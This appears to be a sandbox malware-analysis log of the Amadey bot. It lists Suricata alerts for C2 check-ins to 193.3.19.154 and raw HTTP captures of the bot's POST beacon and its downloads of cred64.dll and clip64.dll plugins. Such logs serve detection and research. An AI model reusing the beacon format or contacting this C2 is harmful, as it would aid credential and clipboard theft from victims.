Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49837 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49705 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49705 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49707 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49707 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49837 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49775 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49867 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49867 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49775 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49878 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49859 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49878 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49848 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49848 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49741 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49741 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49930 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49930 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49859 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49794 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49794 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49752 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49752 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49958 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49958 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49940 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49920 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49920 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49940 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49722 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49722 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49826 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49826 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49987 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49987 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49998 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50031 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50031 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50034 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50034 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50023 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50024 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50023 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50035 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49998 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50024 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50009 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50009 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50027 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50028 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50035 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50027 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50022 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50028 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50022 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50030 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50030 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50032 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50032 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50016 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50016 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49967 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49967 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49887 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50019 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50017 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49887 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50017 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50029 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50029 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50019 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50026 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50026 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49898 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49898 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49909 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49909 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49950 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49950 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50018 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50018 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50021 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50021 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50020 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50020 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49976 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50025 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49976 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50025 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50033 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50033 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50036 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50036 -> 193.3.19.154:80
                  Source: Malware configuration extractorIPs: 193.3.19.154
                  Source: global traffic HTTP traffic detected: POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global traffic HTTP traffic detected: GET /store/games/Plugins/cred64.dll HTTP/1.1
                  Host: 193.3.19.154
                  Source: global traffic HTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1
                  Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
